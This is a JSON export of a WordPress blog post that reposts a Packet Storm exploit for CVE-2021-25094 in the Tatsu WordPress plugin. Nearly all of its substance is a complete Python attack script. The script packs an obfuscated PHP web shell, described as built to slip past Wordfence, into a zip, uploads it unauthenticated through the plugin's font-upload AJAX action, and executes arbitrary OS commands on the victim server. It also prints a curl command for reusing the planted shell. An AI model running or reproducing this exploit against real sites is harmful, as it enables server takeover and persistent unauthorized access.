{"id":368,"date":"2025-04-19T19:03:13","date_gmt":"2025-04-19T19:03:13","guid":{"rendered":"http:\/\/localhost\/?p=368"},"modified":"2025-04-19T19:03:13","modified_gmt":"2025-04-19T19:03:13","slug":"tatsu-3311-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=368","title":{"rendered":"Tatsu 3.3.11 Remote Code Execution"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Tatsu 3.3.11 Remote Code Execution<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">PACKETSTORM:190566<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">packetstorm<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-04-18T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-04-18T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">8.1<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ff4444; font-weight: bold;\">HIGH<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:H\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2021-25094<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nTatsu versions 3.3.11&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n#!\/usr\/bin\/python3<br \/>    # coding: utf-8<\/p>\n<p>    # Exploit Title:Tatsu <= 3.3.11 pre-auth RCE exploit<br \/>    # Date: 2025-04-16<br \/>    # Exploit Author: Milad Karimi (Ex3ptionaL)<br \/>    # Contact: miladgrayhat@gmail.com<br \/>    # Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL<br \/>    # MiRROR-H: https:\/\/mirror-h.org\/search\/hacker\/49626\/<br \/>    # Product: Tatsu wordpress plugin <= 3.3.11<br \/>    # CVE: CVE-2021-25094<br \/>    # URL: https:\/\/tatsubuilder.com\/<\/p>\n<p>    import sys<br \/>    import requests<br \/>    import argparse<br \/>    import urllib3<br \/>    import threading<br \/>    import time<br \/>    import base64<br \/>    import queue<br \/>    import io<br \/>    import os<br \/>    import zipfile<br \/>    import string<br \/>    import random<br \/>    from datetime import datetime<\/p>\n<p>    urllib3.disable_warnings()<\/p>\n<p>    class HTTPCaller():<\/p>\n<p>     def __init__(self, url, headers, proxies, cmd):<br \/>      self.url = url<br \/>      self.headers = headers<br \/>      self.proxies = proxies<br \/>      self.cmd = cmd<br \/>      self.encodedCmd = base64.b64encode(cmd.encode(&#8220;utf8&#8221;))<br \/>      self.zipname = None<br \/>      self.shellFilename = None<\/p>\n<p>      if self.url[-1] == &#8216;\/&#8217;:<br \/>       self.url = self.url[:-1]<\/p>\n<p>      if proxies:<br \/>       self.proxies = {&#8220;http&#8221; : proxies, &#8220;https&#8221; : proxies}<br \/>      else:<br \/>       self.proxies = {}<\/p>\n<p>     def generateZip(self, compressionLevel, technique, customShell, keep):<br \/>      buffer = io.BytesIO()<br \/>      with zipfile.ZipFile(buffer, &#8220;w&#8221;, zipfile.ZIP_DEFLATED, False,<br \/>    compressionLevel) as zipFile:<\/p>\n<p>       if technique == &#8220;custom&#8221; and customShell and os.path.isfile(customShell):<br \/>        with open(customShell) as f:<br \/>         shell = f.readlines()<br \/>        shell = &#8220;\\n&#8221;.join(shell)<br \/>        self.shellFilename = os.path.basename(customShell)<br \/>        if self.shellFilename[0] != &#8220;.&#8221;:<br \/>         self.shellFilename = &#8220;.&#8221; + self.shellFilename<\/p>\n<p>        zipFile.writestr(self.shellFilename, shell)<\/p>\n<p>       elif technique == &#8220;php&#8221;:<br \/>        # a lazy obfuscated shell, basic bypass Wordfence<br \/>        # i would change base64 encoding for something better<br \/>        shell = &#8220;<?php \"<br \/>        shell += &#8220;$f = \\&#8221;lmeyst\\&#8221;;&#8221;<br \/>        shell += &#8220;@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];&#8221;<br \/>        shell += &#8220;@$words = array(base64_decode($_POST[&#8216;text&#8217;]));&#8221;<br \/>        shell += &#8220;$j=\\&#8221;array\\&#8221;.\\&#8221;_\\&#8221;.\\&#8221;filter\\&#8221;;&#8221;<br \/>        shell += &#8220;@$filtered_words = $j($words, $a);&#8221;<br \/>        if not keep:<br \/>         shell += &#8220;@unlink(__FILE__);&#8221;<br \/>        self.shellFilename = &#8220;.&#8221; +<br \/>    (&#8221;.join(random.choice(string.ascii_lowercase) for i in range(5))) + &#8220;.php&#8221;<br \/>        zipFile.writestr(self.shellFilename, shell)<\/p>\n<p>       elif technique.startswith(&#8220;htaccess&#8221;):<\/p>\n<p>        # requires AllowOverride All in the apache config file<br \/>        shell = &#8220;AddType application\/x-httpd-php .png\\n&#8221;<br \/>        zipFile.writestr(&#8220;.htaccess&#8221;, shell)<\/p>\n<p>        shell = &#8220;<?php \"<br \/>        shell += &#8220;$f = \\&#8221;lmeyst\\&#8221;;&#8221;<br \/>        shell += &#8220;@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];&#8221;<br \/>        shell += &#8220;@$words = array(base64_decode($_POST[&#8216;text&#8217;]));&#8221;<br \/>        shell += &#8220;$j=\\&#8221;array\\&#8221;.\\&#8221;_\\&#8221;.\\&#8221;filter\\&#8221;;&#8221;<br \/>        shell += &#8220;@$filtered_words = $j($words, $a);&#8221;<br \/>        if not keep:<br \/>         shell += &#8220;@unlink(&#8216;.&#8217;+&#8217;h&#8217;+&#8217;t&#8217;+&#8217;a&#8217;+&#8217;cc&#8217;+&#8217;e&#8217;+&#8217;ss&#8217;);&#8221;<br \/>         shell += &#8220;@unlink(__FILE__);&#8221;<br \/>        self.shellFilename = &#8220;.&#8221; +<br \/>    (&#8221;.join(random.choice(string.ascii_lowercase) for i in range(5))) + &#8220;.png&#8221;<br \/>        zipFile.writestr(self.shellFilename, shell)<\/p>\n<p>       else:<br \/>        print(&#8220;Error: unknow shell technique %s&#8221; % technique)<br \/>        sys.exit(1)<\/p>\n<p>       self.zipname = &#8221;.join(random.choice(string.ascii_lowercase) for i in<br \/>    range(3))<\/p>\n<p>      self.zipFile = buffer<\/p>\n<p>     def getShellUrl(self):<br \/>      return &#8220;%s\/wp-content\/uploads\/typehub\/custom\/%s\/%s&#8221; % (self.url,<br \/>    self.zipname, self.shellFilename)<\/p>\n<p>     def executeCmd(self):<br \/>      return requests.post(url = self.getShellUrl(), data = {&#8220;text&#8221;:<br \/>    self.encodedCmd}, headers = self.headers, proxies = self.proxies,<br \/>    verify=False)<\/p>\n<p>     def upload(self):<br \/>      url = &#8220;%s\/wp-admin\/admin-ajax.php&#8221; % self.url<br \/>      files = {&#8220;file&#8221;: (&#8220;%s.zip&#8221; % self.zipname, self.zipFile.getvalue())}<br \/>      return requests.post(url = url, data = {&#8220;action&#8221;: &#8220;add_custom_font&#8221;},<br \/>    files = files, headers = self.headers, proxies = self.proxies, verify=False)<\/p>\n<p>    def main():<br \/>     description = &#8220;|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress<br \/>    plugin <= 3.3.8\\n\"<br \/>     description += &#8220;|=== CVE-2021-25094 \/ Vincent MICHEL (@darkpills)&#8221;<\/p>\n<p>     print(description)<br \/>     print(&#8220;&#8221;)<\/p>\n<p>     parser = argparse.ArgumentParser()<br \/>     parser.add_argument(&#8220;url&#8221;, help=&#8221;Wordpress vulnerable URL (example:<br \/>    https:\/\/mywordpress.com\/)&#8221;)<br \/>     parser.add_argument(&#8220;cmd&#8221;, help=&#8221;OS command to execute&#8221;)<br \/>     parser.add_argument(&#8216;&#8211;technique&#8217;, help=&#8221;Shell technique: php | htaccess |<br \/>    custom&#8221;, default=&#8221;php&#8221;)<br \/>     parser.add_argument(&#8216;&#8211;customShell&#8217;, help=&#8221;Provide a custom PHP shell file<br \/>    that will take a base64 cmd as $_POST[&#8216;text&#8217;] input&#8221;)<br \/>     parser.add_argument(&#8216;&#8211;keep&#8217;, help=&#8221;Do not auto-destruct the uploaded PHP<br \/>    shell&#8221;, default=False, type=bool)<br \/>     parser.add_argument(&#8216;&#8211;proxy&#8217;, help=&#8221;Specify and use an HTTP proxy<br \/>    (example: http:\/\/localhost:8080)&#8221;)<br \/>     parser.add_argument(&#8216;&#8211;compressionLevel&#8217;, help=&#8221;Compression level of the<br \/>    zip file (0 to 9, default 9)&#8221;, default=9, type=int)<\/p>\n<p>     args = parser.parse_args()<br \/>     # Use web browser-like header<br \/>     headers = {<br \/>      &#8220;X-Requested-With&#8221;: &#8220;XMLHttpRequest&#8221;,<br \/>      &#8220;Origin&#8221;: args.url,<br \/>      &#8220;Referer&#8221;: args.url,<br \/>      &#8220;User-Agent&#8221;: &#8220;Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML,<br \/>    like Gecko) Chrome\/90.0.4430.212 Safari\/537.36&#8243;,<br \/>      &#8220;Accept&#8221;: &#8220;*\/*&#8221;,<br \/>      &#8220;Accept-Language&#8221;: &#8220;en-US,en;q=0.9&#8221;<br \/>     }<\/p>\n<p>     caller = HTTPCaller(args.url, headers, args.proxy, args.cmd)<br \/>     print(&#8220;[+] Generating a zip with shell technique &#8216;%s'&#8221; % args.technique)<br \/>     caller.generateZip(args.compressionLevel, args.technique,<br \/>    args.customShell, args.keep)<\/p>\n<p>     print(&#8220;[+] Uploading zip archive to<br \/>    %s\/wp-admin\/admin-ajax.php?action=add_custom_font&#8221; % (args.url))<br \/>     r = caller.upload()<br \/>     if (r.status_code != 200 or not r.text.startswith(&#8216;{&#8220;status&#8221;:&#8221;success&#8221;&#8216;)):<br \/>      print(&#8220;[!] Got an unexpected HTTP response: %d with content:\\n%s&#8221; %<br \/>    (r.status_code, r.text))<br \/>      print(&#8220;[!] Exploit failed!&#8221;)<br \/>      sys.exit(1)<\/p>\n<p>     print(&#8220;[+] Upload OK&#8221;)<\/p>\n<p>     print(&#8220;[+] Trigger shell at %s&#8221; % caller.getShellUrl())<br \/>     r = caller.executeCmd()<br \/>     if (r.status_code != 200):<br \/>      print(&#8220;[!] Got an unexpected HTTP response: %d with content:\\n%s&#8221; %<br \/>    (r.status_code, r.text))<br \/>      print(&#8220;[!] Exploit failed!&#8221;)<br \/>      sys.exit(1)<br \/>     print(&#8220;[+] Exploit success!&#8221;)<br \/>     print(r.text)<\/p>\n<p>     if args.keep:<br \/>      print(&#8220;[+] Call it with:&#8221;)<br \/>      print(&#8216;curl -X POST -d&#8221;text=$(echo &#8220;{0}&#8221; | base64 -w0)&#8221;<br \/>    {1}&#8217;.format(args.cmd, caller.getShellUrl()))<br \/>     else:<br \/>      print(&#8220;[+] Shell file has been auto-deleted but parent directory will<br \/>    remain on the webserver&#8221;)<\/p>\n<p>     print(&#8220;[+] Job done&#8221;)<\/p>\n<p>    if __name__ == &#8216;__main__&#8217;:<br \/>        main()\n<\/div>\n<p><a href=\"https:\/\/packetstorm.news\/files\/id\/190566\/\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title Tatsu 3.3.11 Remote Code Execution Exploit ID PACKETSTORM:190566 Type packetstorm Published 2025-04-18T00:00:00 Modified 2025-04-18T00:00:00 CVSS Information CVSS Score 8.1&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,52,12,15,13,53,7,11,5],"class_list":["post-368","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-81","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Tatsu 3.3.11 Remote Code Execution - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=368\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Tatsu 3.3.11 Remote Code Execution - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Tatsu 3.3.11 Remote Code Execution Exploit ID PACKETSTORM:190566 Type packetstorm Published 2025-04-18T00:00:00 Modified 2025-04-18T00:00:00 CVSS Information CVSS Score 8.1...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=368\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-19T19:03:13+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=368#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=368\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Tatsu 3.3.11 Remote Code Execution\",\"datePublished\":\"2025-04-19T19:03:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=368\"},\"wordCount\":69,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.1\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=368#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=368\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=368\",\"name\":\"Tatsu 3.3.11 Remote Code Execution - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-04-19T19:03:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=368#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=368\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=368#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Tatsu 3.3.11 Remote Code Execution\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Tatsu 3.3.11 Remote Code Execution - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=368","og_locale":"en_US","og_type":"article","og_title":"Tatsu 3.3.11 Remote Code Execution - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Tatsu 3.3.11 Remote Code Execution Exploit ID PACKETSTORM:190566 Type packetstorm Published 2025-04-18T00:00:00 Modified 2025-04-18T00:00:00 CVSS Information CVSS Score 8.1...","og_url":"https:\/\/zero.redgem.net\/?p=368","og_site_name":"zero redgem","article_published_time":"2025-04-19T19:03:13+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=368#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=368"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Tatsu 3.3.11 Remote Code Execution","datePublished":"2025-04-19T19:03:13+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=368"},"wordCount":69,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.1","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=368#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=368","url":"https:\/\/zero.redgem.net\/?p=368","name":"Tatsu 3.3.11 Remote Code Execution - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-04-19T19:03:13+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=368#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=368"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=368#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Tatsu 3.3.11 Remote Code Execution"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/368","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=368"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/368\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=368"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=368"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=368"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}